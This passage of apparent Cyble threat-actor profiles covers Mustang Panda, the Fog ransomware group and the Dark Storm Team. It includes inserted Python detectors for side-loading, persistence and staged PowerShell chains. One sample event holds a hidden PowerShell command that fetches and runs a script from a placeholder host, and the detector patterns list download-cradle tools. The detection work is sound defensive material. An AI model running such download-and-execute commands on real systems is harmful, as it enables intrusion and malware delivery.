Mustang Panda’s toolkit is extensive and diverse, combining custom malware families, open-source utilities, and widely known credential theft frameworks. Their known arsenal includes: 

  • Backdoors: 9002 RAT, Bookworm, CANONSTAGER, DOPLUGS, Farseer, Hodur, RCSession, TinyNote, TONESHELL, WispRider 

  • Loaders / Droppers: HopperTick, MISTCLOAK, Orat, PUBLOAD, SplatDropper, TONEINS 

  • Reconnaissance Tools: AdFind, NetSess, Netview, nmap, PowerView, PVE Find AD Users, PlugX (also used for reconnaissance), THOR, Zupdax 

  • Credential Theft Tools: Impacket, Mimikatz, DCSync, Hdump 

  • Backdoor / Shell Utilities: TeamViewer, China Chopper 

  • Other Components: nbtscan, Wevtutil, WmiExec, SnakeDisk (worm capability), STATICPLUGIN, CorKLOG, PAKLOG, HenBox (info stealer) 

In addition to their own malware, Mustang Panda frequently utilizes legitimate administrative software or security products to execute side-loading attacks. 
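Side-loading of the kind described here (a legitimate executable shipped beside a malicious DLL, as in the phishing archives mentioned earlier) can be caught either before execution, in the archive itself, or at load time in image-load telemetry. The block below is an added example (not Mustang Panda tooling and not Cyble code) that does both over constructed data: the Sysmon Event ID 7 style records, the archive member list, the AcroUpdate.exe name and the short SYSTEM_DLL_NAMES list are all assumptions made for the example.

```python
"""Added example, not Mustang Panda tooling or Cyble code: flag DLL
side-loading candidates in (a) constructed Sysmon Image Load (Event ID 7)
records and (b) the member list of a phishing archive that pairs a
legitimate-looking EXE with a DLL."""
import ntpath
from collections import defaultdict

# Assumed: a few DLL names that legitimately ship in System32. A copy placed in
# the application's own directory wins under the default DLL search order.
SYSTEM_DLL_NAMES = {"version.dll", "wininet.dll", "dwmapi.dll", "cryptbase.dll", "userenv.dll"}
SYSTEM_DIR_PREFIXES = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")


def is_user_writable(directory: str) -> bool:
    low = directory.lower()
    return low.startswith(USER_WRITABLE_PREFIXES) or "\\temp\\" in low


# Constructed records with Sysmon EID 7 field names ("Signed" refers to ImageLoaded).
IMAGE_LOAD_EVENTS = [
    {"Image": r"C:\Users\jdoe\Downloads\Invoice\AcroUpdate.exe",
     "ImageLoaded": r"C:\Users\jdoe\Downloads\Invoice\version.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendorlib.dll", "Signed": "true"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\7z\setup.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\7z\dwmapi.dll", "Signed": "false"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\cryptbase.dll", "Signed": "true"},
]


def sideload_findings(events) -> list:
    """A system DLL name resolved outside the Windows directories, co-located
    with its host process and unsigned or in a user-writable path, is the
    classic side-loading shape. Two reasons are required to raise a finding."""
    findings = []
    for i, ev in enumerate(events):
        dll = ev["ImageLoaded"]
        name = ntpath.basename(dll).lower()
        dll_dir = ntpath.dirname(dll).lower()
        if name not in SYSTEM_DLL_NAMES or dll_dir.startswith(SYSTEM_DIR_PREFIXES):
            continue
        reasons = []
        if dll_dir == ntpath.dirname(ev["Image"]).lower():
            reasons.append("DLL co-located with the loading executable")
        if is_user_writable(dll_dir):
            reasons.append("loaded from a user-writable directory")
        if ev.get("Signed", "").lower() != "true":
            reasons.append("DLL is unsigned")
        if len(reasons) >= 2:
            findings.append((i, name, reasons))
    return findings


# Constructed member list of a phishing archive (forward slashes, as zip/rar listings use).
ARCHIVE_LISTING = ["Invoice/AcroUpdate.exe", "Invoice/version.dll", "Invoice/AcroUpdate.dat",
                   "Invoice/Invoice_2026.pdf", "photos/img1.jpg"]


def archive_sideload_candidates(members) -> dict:
    """Folders that hold an .exe next to at least one .dll. The other files are
    reported too, because side-loading chains often keep the real payload in a
    separate blob beside the pair."""
    by_dir = defaultdict(list)
    for path in members:
        folder, _, name = path.rpartition("/")
        by_dir[folder].append(name.lower())
    out = {}
    for folder, names in by_dir.items():
        exes = sorted(n for n in names if n.endswith(".exe"))
        dlls = sorted(n for n in names if n.endswith(".dll"))
        if exes and dlls:
            out[folder] = {"exe": exes, "dll": dlls,
                           "other": sorted(n for n in names if not n.endswith((".exe", ".dll")))}
    return out


if __name__ == "__main__":
    print(sideload_findings(IMAGE_LOAD_EVENTS))
    print(archive_sideload_candidates(ARCHIVE_LISTING))
```

The load-time rule keys on a DLL name that normally lives in System32 being resolved from the host executable's own directory, because that search-order behaviour is exactly what side-loading abuses; a vendor's own DLL in Program Files is deliberately left alone. The archive rule is cheap enough to run on every inbound attachment before detonation.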

Access, Execution, and Persistence Techniques 

Mustang Panda commonly gains entry into target environments by sending emails that contain harmful attachments or links, often disguised within archive files or hosted on cloud services, which lure recipients into opening content that secretly installs their tools. 

Once they obtain a foothold, the group relies on a broad mix of methods to run their payloads, including scripts, scheduled tasks, document-based tricks, web content, and repurposed legitimate software that helps them blend into normal system activity.  

They also utilize various programming and automation features within operating systems to conceal their actions and ensure their tools continue running after the initial infiltration.  

To remain planted within compromised networks, Mustang Panda employs a variety of persistence mechanisms, including placing startup entries in system settings, hiding behind legitimate applications, deploying lightweight web-based access points, and utilizing techniques that enable their components to activate only under specific conditions. 

Conclusion 

As of mid-2025, Mustang Panda continues to operate as a highly capable state-aligned threat group with a global reach, consistently targeting government agencies, defense contractors, telecommunications providers, and academic institutions. Their campaigns rely on sophisticated phishing methods, custom malware, and strategic use of legitimate tools to maintain long-term access and conduct intelligence operations.  

Cyble’s threat intelligence capabilities provide visibility into persistent espionage threats, helping organizations detect, monitor, and respond to emerging risks in real-time. Book a free demo or start a free external threat assessment to uncover exposed assets, track threat actors like Mustang Panda, and strengthen your organization’s cyber resilience. 

Recommendation and Mitigation Strategies 

  • Strengthen Email Security: Implement advanced email filtering and anti-phishing solutions to block malicious attachments and links. Encourage staff to verify unexpected emails and provide regular phishing awareness training to ensure a secure environment. 

  • Patch and Harden Systems: Regularly update operating systems, applications, and network devices to remediate known vulnerabilities. Prioritize critical systems, including government, defense, and telecommunications platforms. 

  • Restrict Script Execution: Control the execution of scripts, macros, and other automated code. Enforce policies for signed scripts, disable unnecessary scripting engines, and monitor PowerShell, VBScript, and JavaScript usage to ensure optimal security. 

  • Monitor for Abnormal Activity: Deploy endpoint detection and response (EDR) and network monitoring to identify unusual behavior, such as unexpected scheduled tasks, lateral movement, or attempts to manipulate registry keys. 

  • Control Administrative Privileges: Limit administrative rights and implement role-based access control to reduce the risk of credential misuse. Enforce multi-factor authentication (MFA) for all remote and privileged accounts. 

  • Protect Web and Cloud Assets: Scan for exposed web shells, misconfigured cloud storage, and publicly accessible sensitive files. Ensure proper access controls and monitor for unusual access patterns. 

  • Backup and Recovery: Maintain offline, encrypted backups of critical systems and data. Test restoration procedures regularly to minimize disruptions in the event of a compromise. 

  • Threat Intelligence Integration: Leverage real-time threat intelligence, such as from Cyble, to track Mustang Panda activity, identify new TTPs (tactics, techniques, and procedures), and proactively defend against targeted campaigns. 

  • Incident Response Preparedness: Develop and regularly update incident response plans, including specific protocols for espionage-focused intrusions and persistence-based malware, ensuring rapid containment and remediation. 

MITRE ATT&CK Techniques Associated with Mustang Panda 

MITRE ATT&CK Techniques (Source: Cyble Vision) 

  • Spearphishing Attachment (T1566.001): Mustang Panda uses spearphishing emails containing RAR or ZIP archives that bundle legitimate executables with malicious DLLs. These attachments were central to the RedDelta Modified PlugX Infection Chain for gaining initial access. 

  • Spearphishing Link (T1566.002): The group sends phishing emails with embedded links that direct victims to malicious archives hosted on platforms like Google Drive or Dropbox. In RedDelta operations, these links led to HTML pages that fingerprinted the victim’s system and delivered malicious MSC files. 

  • Windows Management Instrumentation (T1047): Mustang Panda executes malicious PowerShell scripts through WMI to run payloads and support follow‑on activity. 

  • Scheduled Task (T1053.005): The group creates scheduled tasks to launch malware, maintain persistence, and establish reverse shells for long‑term access. 

  • Command and Scripting Interpreter (T1059): Mustang Panda has used various scripting interpreters, including the deployment of Meterpreter shellcode for execution. 

  • PowerShell (T1059.001): The group uses malicious PowerShell scripts and relies on LNK files to trigger PowerShell commands that install payloads such as PlugX, as observed in RedDelta activity. 

  • Windows Command Shell (T1059.003): Mustang Panda executes HTA files, batch scripts, and command-line instructions, including commands designed to delay execution before launching malware. 

  • Visual Basic (T1059.005): The group embeds VBScript in LNK files to enable downloads and collection, uses malicious VBA macros in documents, and employs VBS-based persistence via “autorun.vbs” placed in startup folders. 

  • JavaScript (T1059.007): Mustang Panda executes JavaScript payloads using wscript.exe to run malicious scripts on target systems. 

  • Software Deployment Tools (T1072): Legitimate enterprise tools, including antivirus and security agents, are abused to run scripts and side‑load malicious DLLs. 

  • Native API (T1106): The group makes extensive use of Windows API calls for execution and evasion. 

  • Shared Modules (T1129): DLLs are loaded using functions like LoadLibrary to support execution chains. 

  • Exploitation for Client Execution (T1203): Mustang Panda exploits vulnerabilities such as CVE‑2017‑0199 and uses techniques like GrimResource to weaponize MSC files for arbitrary code execution. 

  • Malicious Link (T1204.001): The group sends links to malicious webpages that deploy JavaScript-based droppers. In some cases, these links trigger MSC files that execute PowerShell commands to retrieve remote MSI installers. 

  • Malicious File (T1204.002): User‑executed malicious files, including LNK objects and executables showing tailored decoy documents, are used to deliver malware during campaigns like those linked to RedDelta. 

  • Traffic Signaling (T1205): Mustang Panda uses “magic packet” values in command‑and‑control communication, activating in-memory components only when specific packet patterns are detected. 
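
The "Monitor for Abnormal Activity" recommendation above and the T1053.005 and T1059.005 entries name concrete persistence artifacts: scheduled tasks that launch scripting hosts, and an autorun.vbs dropped into a Startup folder. The following is an added detection example written for this page; it is not Cyble's code and not part of any tool the profile mentions. It runs two rules over constructed sample events shaped like Windows Security event 4698 (scheduled task created, carrying the task's XML in TaskContent) and Sysmon event 11 (file created, with TargetFilename). All task names, paths and values in the sample batch are constructed for illustration.

```python
"""Two detection rules for persistence artifacts named in the profile:
scheduled tasks that launch scripting hosts or run from user-writable paths
(T1053.005), and script files dropped into a Startup folder (the autorun.vbs
technique under T1059.005). All events below are constructed samples."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Script hosts and LOLBins whose use as a scheduled-task action deserves review.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Locations a standard user can write to; persistence rarely belongs there.
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)
# Per-user and all-users Startup folders share this path suffix.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".hta", ".bat", ".cmd", ".lnk")

# Minimal Task Scheduler XML as carried in Security event 4698's TaskContent.
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Actions><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments>'
            '</Exec></Actions></Task>')


def exec_actions(task_xml: str) -> List[Dict[str, str]]:
    """Return every <Exec> action's command and arguments, ignoring XML namespaces."""
    actions = []
    for elem in ET.fromstring(task_xml).iter():
        if elem.tag.rsplit("}", 1)[-1] != "Exec":
            continue
        fields = {child.tag.rsplit("}", 1)[-1]: (child.text or "").strip()
                  for child in elem}
        actions.append({"command": fields.get("Command", ""),
                        "arguments": fields.get("Arguments", "")})
    return actions


def analyze_task_creation(task_name: str, task_xml: str) -> Optional[Dict]:
    """Flag a new task whose action launches a script host or touches a user-writable path."""
    reasons = []
    for action in exec_actions(task_xml):
        exe = action["command"].strip('"').rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            reasons.append(f"action launches scripting host {exe}")
        if USER_WRITABLE.search(action["command"] + " " + action["arguments"]):
            reasons.append("action references a user-writable path")
    if not reasons:
        return None
    return {"technique": "T1053.005", "object": task_name, "reasons": reasons}


def analyze_file_creation(target: str) -> Optional[Dict]:
    """Flag script-like files written into a Startup folder."""
    if STARTUP_DIR.search(target) and target.lower().endswith(SCRIPT_EXT):
        return {"technique": "T1059.005", "object": target,
                "reasons": ["script dropped in Startup folder"]}
    return None


def run_detections(events: List[Dict]) -> List[Dict]:
    """Dispatch each event to the rule for its EventID; return all findings."""
    findings = []
    for ev in events:
        finding = None
        if ev["EventID"] == 4698:
            finding = analyze_task_creation(ev["TaskName"], ev["TaskContent"])
        elif ev["EventID"] == 11:
            finding = analyze_file_creation(ev["TargetFilename"])
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "TaskContent": TASK_XML.format(cmd=r"%systemroot%\system32\usoclient.exe", args="StartScan")},
    {"EventID": 4698, "TaskName": r"\OneDriveUpdate",
     "TaskContent": TASK_XML.format(cmd=r"C:\Windows\System32\wscript.exe",
                                    args=r'"C:\Users\alice\AppData\Roaming\update.js"')},
    {"EventID": 4698, "TaskName": r"\Adobe Update",
     "TaskContent": TASK_XML.format(cmd=r"C:\Users\bob\AppData\Local\Temp\adobe\helper.exe", args="")},
    {"EventID": 11, "TargetFilename":
     r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorun.vbs"},
    {"EventID": 11, "TargetFilename": r"C:\Users\alice\Documents\report.docx"},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f["technique"], f["object"], "->", "; ".join(f["reasons"]))
```

The built-in Update Orchestrator task and the Word document produce no finding; the wscript.exe task, the task running from a Temp directory, and the Startup-folder .vbs each do. In production the same rules would read from a SIEM rather than an inline list, and the script-host set would be tuned against the organisation's own baseline of legitimate tasks.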

The post Threat Actor Profile: Mustang Panda appeared first on Cyble.

Threat Actor Profile: Fog Ransomware Group https://cyble.com/threat-actor-profiles/fog-ransomware-group/ Tue, 02 Dec 2025 13:36:03 +0000 https://cyble.com/?post_type=threat_actor&p=107437

The Fog ransomware group is one of the fastest-growing cybercrime actors, gaining attention for its multi-stage infection chain, broad targeting range, and reliance on affiliates.  

Last observed in March 2025, the group left behind a complex operational footprint that indicates both technical maturity and organized collaboration across multiple campaigns.  

Although their public-facing activity has ceased, the group’s tactics and toolsets continue to inform investigations into affiliated ransomware operators and potential successor entities. 

Initial Access and Multi-Stage Delivery Chain 

Fog campaigns relied heavily on phishing as the primary means of entry. The group distributed emails containing an archive titled “Pay Adjustment.zip”, which included an LNK shortcut disguised to resemble a PDF document. When executed, this shortcut initiated a download sequence that retrieved stage1.ps1, a PowerShell script responsible for triggering the remaining infection stages. 

This script functioned as the centerpiece of the operation. It downloaded additional payloads, including a ransomware loader named cwiper.exe and a privilege-escalation utility known as ktool.exe, and fetched secondary scripts used for reconnaissance and data exfiltration. The same PowerShell command embedded in the script also appeared within the deobfuscated ransom-note text, suggesting that the group relied on multiple vectors that all funneled back to the same staging mechanism. 

Beyond its technical role, stage1.ps1, the primary bootstrapper, contains nonstandard content for ransomware operations: political commentary and commands to open political YouTube videos. This mix of functionality and messaging made Fog campaigns unusual compared to more commercially driven ransomware groups. 
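
As an added illustration written for this page (not Cyble's code and nothing recovered from Fog tooling), the detection below reconstructs a process tree from constructed Sysmon event 1 style records and scores each PowerShell process for the chain described above: launched from Explorer (as an LNK opened by the user would be), carrying a download cradle, and then spawning executables from a user-writable directory. This is the kind of behavioural rule the EDR recommendation later in the profile refers to. The host name example.invalid, the user profile path and the process IDs are placeholders; the file names stage1.ps1, cwiper.exe and ktool.exe are taken from the profile.

```python
"""Score PowerShell process-creation events for the staged-download chain
described above: PowerShell launched from Explorer (as an LNK opened by the
user would be), carrying a download cradle, then spawning executables from a
user-writable directory. Records are constructed Sysmon event 1 style samples."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
HIDDEN_WINDOW = re.compile(r"-(w|window|windowstyle)\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ALERT_THRESHOLD = 3  # a bare interactive console scores 1 and must not alert


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    children: List["Proc"] = field(default_factory=list)

    @property
    def exe(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def build_tree(events: List[Dict]) -> Dict[int, Proc]:
    """Index processes by PID and link each to its parent when the parent is in the batch."""
    procs = {e["ProcessId"]: Proc(e["ProcessId"], e["ParentProcessId"],
                                  e["Image"], e["CommandLine"]) for e in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def score_powershell(proc: Proc, procs: Dict[int, Proc]) -> Dict:
    """Add up weighted indicators; each reason explains one part of the score."""
    score, reasons = 0, []
    if DOWNLOAD_CRADLE.search(proc.cmdline):
        score += 2
        reasons.append("download cradle in command line")
    if HIDDEN_WINDOW.search(proc.cmdline):
        score += 1
        reasons.append("hidden window requested")
    if ENCODED_CMD.search(proc.cmdline):
        score += 1
        reasons.append("encoded command")
    parent = procs.get(proc.ppid)
    if parent is not None and parent.exe == "explorer.exe":
        score += 1
        reasons.append("launched from Explorer (user double-click, e.g. an LNK)")
    dropped = [c.exe for c in proc.children if USER_WRITABLE.search(c.image)]
    if dropped:
        score += 2
        reasons.append("spawned children from user-writable path: " + ", ".join(dropped))
    return {"pid": proc.pid, "score": score, "reasons": reasons, "cmdline": proc.cmdline}


def detect_staged_chains(events: List[Dict], threshold: int = ALERT_THRESHOLD) -> List[Dict]:
    """Return scored findings for every PowerShell process at or above the threshold."""
    procs = build_tree(events)
    scored = [score_powershell(p, procs) for p in procs.values() if p.exe in POWERSHELL]
    return [f for f in scored if f["score"] >= threshold]


# Constructed sample batch (PIDs, user profile and host example.invalid are placeholders).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 1100, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    # The chain from the profile: Explorer -> hidden PowerShell fetching stage1.ps1 -> two droppers.
    {"ProcessId": 2200, "ParentProcessId": 1200, "Image": PS,
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://example.invalid/stage1.ps1 '
                    r'-OutFile $env:TEMP\stage1.ps1; & $env:TEMP\stage1.ps1"'},
    {"ProcessId": 2300, "ParentProcessId": 2200,
     "Image": r"C:\Users\alice\AppData\Local\Temp\cwiper.exe", "CommandLine": "cwiper.exe"},
    {"ProcessId": 2310, "ParentProcessId": 2200,
     "Image": r"C:\Users\alice\AppData\Local\Temp\ktool.exe", "CommandLine": "ktool.exe"},
    # Benign: a management agent running a vendor inventory script.
    {"ProcessId": 3100, "ParentProcessId": 400, "Image": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": "agent.exe"},
    {"ProcessId": 3000, "ParentProcessId": 3100, "Image": PS,
     "CommandLine": r'powershell.exe -NoProfile -File "C:\Program Files\Vendor\inventory.ps1"'},
    # Benign: a user opening an interactive console from Explorer.
    {"ProcessId": 3200, "ParentProcessId": 1200, "Image": PS, "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for f in detect_staged_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']} score {f['score']}: " + "; ".join(f["reasons"]))
```

Only the Explorer-spawned, hidden, downloading PowerShell that then launches cwiper.exe and ktool.exe from Temp reaches the threshold (score 6); the agent-driven script scores 0 and the interactive console scores 1. Scoring rather than a single hard match keeps the rule useful when one stage is missing from the telemetry, for example when the child processes are not yet visible at the time the PowerShell event is evaluated.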

Payload Structure and Anti-Analysis Behavior 

Fog’s payload ecosystem comprised several distinct components. Scripts such as Lootsubmit.ps1 and Trackerjacker.ps1 gathered system metadata, network details, and geolocation information, sometimes through external services like the Wigle API, before sending the results to a remote receiver. The ransom workflow was linked to a Monero payment address, often embedded in a QR code dropped on infected machines. 

Privilege escalation attempts were facilitated through ktool.exe, which deployed a vulnerable Intel driver (iQVW64.sys) to exploit a known flaw. Meanwhile, the ransomware loader embedded an encrypted Fog binary, decrypting it at runtime using a key unique to each variant. To complicate analysis, the loader performed several environmental checks (CPU count, memory size, MAC prefixes, registry markers, and timing anomalies) and halted execution if sandbox indicators were detected. 

During encryption, the malware generated dbgLog.sys, a log file, to record activity and deposited a ransom note named readme.txt. Some variants included intentionally provocative or sarcastic language, referencing fictional agencies such as the “Department of Government Efficiency.” 

Affiliate Tools and Open Directory Exposure

Malware Families and Tools Used by the Fog Ransomware Group (Source: Cyble Vision)   

The Fog ransomware group operates a mature Ransomware-as-a-Service ecosystem. According to Cyble Vision’s data, the items found in the exposed open directory include: 

  • Sliver C2 frameworks 

  • SonicWall VPN credential scanners 

  • Credential dumps associated with stolen VPN access 

  • DonPAPI and Impacket tools for DPAPI theft and lateral movement 

  • Active Directory exploitation tools, including Certipy and Zer0dump 

  • Kerberos/PAC attack scripts associated with noPac and Pachine 

  • AnyDesk installers and automation scripts 

  • Utility tools such as Powercat and Proxychains 

This extensive toolkit allows the Fog ransomware group to run full-scale intrusion operations, including reconnaissance, credential harvesting, persistence, and stealthy pivoting. 

Exploited Vulnerabilities and Campaign Expansion 

Fog operators exploited several notable vulnerabilities during their campaigns. These included: 

  • CVE-2024-40766, an access-control flaw affecting SonicWall SSL-VPN appliances 

  • CVE-2020-1472 (Zerologon) for domain-level compromise 

  • CVE-2021-42278 and CVE-2021-42287, used for Kerberos abuse 

  • CVE-2015-2291, leveraged through the vulnerable Intel Ethernet diagnostics driver 

Additionally, between January and March 2025, Fog-associated actors targeted GitLab environments, exfiltrating source code and releasing it incrementally to pressure victims. Shortly after these incidents, the group’s dedicated leak site went offline.  

Global Footprint and Affected Sectors 

Countries Targeted by the Fog Ransomware Group (Source: Cyble Vision)   

Fog ransomware activity extended across a wide geographic range, affecting organizations in regions including Europe, Asia, Africa, and the Americas. Impacted countries include Austria, Australia, Belgium, Brazil, Canada, Germany, Egypt, Israel, India, Mexico, the Philippines, Turkey, the United States, Vietnam, and many others. 

The targeting scope was equally broad. Documented victims span more than two dozen sectors, among them: 

  • Aerospace and defense 

  • Education 

  • Government and law enforcement 

  • Financial services 

  • Healthcare 

  • Manufacturing 

  • Media and entertainment 

  • Technology and telecommunications 

  • Retail 

  • Transportation and logistics 

  • Energy and utilities 

  • Pharmaceuticals and biotechnology 

Victim Activity and Double-Extortion Operations 

Fog operated under a double-extortion model, both encrypting data and stealing sensitive information to pressure victims with the threat of publishing it. The group claimed more than 100 affected organizations. 

One confirmed case involved Waverley Christian College in Australia, which reported a cyber incident in December 2024 after the group claimed theft of several gigabytes of data. Early Fog campaigns concentrated on U.S. schools and recreation centers in mid-2024, but later activity expanded to include financial and commercial entities. 

Conclusion 

Although the Fog ransomware group has shown no confirmed activity since March 2025, its earlier campaigns highlight a technically capable operation that leveraged phishing-based delivery chains, staged PowerShell scripts, privilege-escalation exploits, and a broad affiliate toolkit.  

Whether the group has dissolved or rebranded is still unclear, but its tactics continue to inform current investigations into new ransomware actors. For organizations monitoring similar threats, Cyble’s intelligence resources can support ongoing detection and analysis to strengthen visibility into ransomware activity. Start by requesting an external threat assessment report or scheduling a personalized demo today! 

Recommendation and Mitigation Strategies 

  • Implement strict email security controls to block phishing attachments, especially LNK files disguised as documents, and deploy sandbox inspection for ZIP archives. 

  • Harden PowerShell usage by enforcing constrained language mode, script signing policies, and monitoring for suspicious execution patterns tied to multi-stage loaders. 

  • Patch exposed systems promptly, prioritizing vulnerabilities abused by Fog operators such as SonicWall SSL-VPN (CVE-2024-40766), Zerologon (CVE-2020-1472), and Active Directory privilege-escalation flaws (CVE-2021-42278/42287). 

  • Restrict the use of vulnerable or unsigned drivers and enable kernel-mode driver blocking to mitigate bring-your-own-vulnerable-driver (BYOVD) attacks like those using iQVW64.sys. 

  • Enforce MFA and monitor VPN access logs to detect misuse of stolen credentials and block anomalous authentication attempts. 

  • Deploy endpoint detection and response (EDR) with behavioral rules that can detect staged PowerShell chains, credential harvesting tools, and lateral movement frameworks. 

  • Segment networks and limit administrative privileges to reduce the impact of credential compromise and obstruct lateral movement via tools like Impacket, DonPAPI, and Kerberos/PAC exploitation kits. 

MITRE ATT&CK Techniques Associated with the Fog Ransomware Group 

MITRE ATT&CK Techniques (Source: Cyble Vision)  

  • Valid Accounts (T1078): Fog operators used stolen or compromised SonicWall VPN credentials, identified in sonic_scan.zip, to authenticate into target environments and gain initial access. 

  • Exploit Public-Facing Application (T1190): Affiliates exploited vulnerabilities in exposed services, most notably the SonicWall SSL-VPN flaw CVE-2024-40766, or reused compromised VPN credentials to breach networks through internet-facing applications. 

  • Spearphishing Attachment (T1566.001): Campaigns delivered phishing emails containing the archive “Pay Adjustment.zip”, which held an LNK file masquerading as a PDF; opening it initiated Fog’s multi-stage PowerShell infection chain. 

  • PowerShell (T1059.001): The stage1.ps1 script served as the primary bootstrapper, downloading the ransomware loader (cwiper.exe), privilege-escalation tool (ktool.exe), and various secondary scripts used in later stages. 

  • Malicious File (T1204.002): The LNK file disguised as a PDF relied on user execution to trigger a command that downloaded stage1.ps1, enabling the broader multi-stage deployment process. 

  • Valid Accounts – Persistence (T1078): Fog operators maintained long-term access by repeatedly leveraging stolen SonicWall VPN credentials to re-enter compromised networks. 

  • Windows Service (T1543.003): Persistence was reinforced through automated installation and configuration of AnyDesk, using a PowerShell script (any.ps1) that deployed the service and set up a default access password. 

The post Threat Actor Profile: Fog Ransomware Group appeared first on Cyble.

Threat Actor Profile: Dark Storm Team https://cyble.com/threat-actor-profiles/dark-storm-team/ Tue, 25 Nov 2025 12:59:42 +0000 https://cyble.com/?post_type=threat_actor&p=106792

The Dark Storm Team is one of the more active hacktivist groups known for conducting politically aligned cyber operations. Known primarily for Distributed Denial-of-Service (DDoS) campaigns, the group’s activity centers on disrupting critical transportation assets, especially airports, while simultaneously marketing DDoS-as-a-Service (DaaS) capabilities to broader audiences.

Dark Storm Team operates under various aliases, including DarkStorm, DarkStormTeam, and MRHELL112, and maintains strong affiliations within the pro-Russian hacktivist ecosystem. Its most notable partnership is with Matryoshka 424, a coalition of aligned threat groups working collectively to advance Russian geopolitical narratives.

Targeting Patterns and Operational Scope 

Although the group’s ideological stance is rooted in support for Russia, its targeting footprint extends far beyond regional boundaries. Reported activity includes campaigns directed at organizations in the United Arab Emirates, Egypt, France, Israel, Italy, the Netherlands, Thailand, Ukraine, and the United States.  

This broad geographic reach reflects a willingness to strike entities perceived as politically relevant, regardless of location. The industries affected by Dark Storm Team's operations indicate a preference for sectors where service disruption would have immediate public visibility. The group’s targets span: 

  • Banking, Financial Services, and Insurance (BFSI) 

  • Energy and Utilities 

  • Government and Law Enforcement 

  • Healthcare 

  • Media and Entertainment 

  • Transportation and Logistics 

Affiliated and Related Hacktivist Groups 

Dark Storm Team maintains links with multiple threat groups whose motivations, tactics, or alliances overlap with its own. These associations strengthen its operational resilience and expand its access to shared tooling and infrastructure. 

  • AlixSec: AlixSec is an Indonesia-leaning, pro-Palestinian hacktivist group known for routine DDoS attacks against government institutions and private organizations. The group has also partnered with groups such as BhinnekaSec and AnonymousWorld to carry out attacks against Indian websites. 

  • Mr. Hamza: Originating from Morocco, Mr. Hamza is a hacktivist threat actor conducting ideologically driven DDoS operations. Its activity frequently targets national security institutions, including intelligence and law enforcement agencies. 

  • OverFlame: OverFlame is firmly situated within the pro-Russian hacktivist environment. Its operations primarily target Ukraine and allied nations, and it collaborates with well-known collectives such as NoName057(16) and the People’s Cyber Army. 

  • Server Killers: Another pro-Russian group, Server Killers, is associated with persistent DDoS operations against organizations considered hostile to Russian state interests. 

  • Team BD Cyber Ninja: This Bangladesh-based group conducts cyber defacement and targeting campaigns focused largely on educational and government institutions in Bangladesh and India. 

  • Z-Pentest: First observed in late 2024, Z-Pentest is one of the newer collectives linked to NoName057(16) and the People’s Cyber Army. The group has demonstrated intent to compromise Industrial Control System (ICS) panels and deface websites.  

Role in Multi-Group Campaigns

The Dark Storm Team played an important role in carrying out cyberattacks that followed the Iran–Israel conflict in June 2025. Numerous hacktivist groups, including GhostSec, Arabian Ghosts, and Mr. Hamza, coordinated attacks across more than 18 critical infrastructure sectors in Israel. These operations included DDoS attacks, ICS intrusions, and data exfiltration. Dark Storm Team contributed by targeting Israeli government services, while other actors deployed tooling such as GhostLocker, GhostStealer, and IOControl. 

Tactics and Techniques 

Dark Storm Team operates in ways that are consistent with many other pro-Russian hacktivist groups. One of its common methods involves breaking into systems that are exposed to the internet. The group looks for weaknesses, such as outdated software or incorrect settings, in places like websites, online platforms, cloud services, or network equipment. When these weaknesses are found, they can be used as entry points into deeper parts of an organization’s environment. 

Another tactic involves overwhelming online services with excessive traffic to knock them offline. This approach targets websites, email systems, and other public-facing services by flooding them with more data than they can handle. To make the attacks more effective and harder to block, the group often sends the traffic from many different sources or disguises where it is coming from. 

In addition to attacking networks, Dark Storm Team may also shut down individual devices by overloading their resources. This can cause systems to freeze, crash, or become too slow to function normally, even when the wider network remains intact. 

Before carrying out any of these operations, the group usually gathers details about its targets. This can include information about users, login methods, or how systems are configured. They collect this data by scanning online services, tricking individuals into revealing information, or placing harmful code on compromised websites. This preparation allows their attacks to be more precise and effective. 

Conclusion 

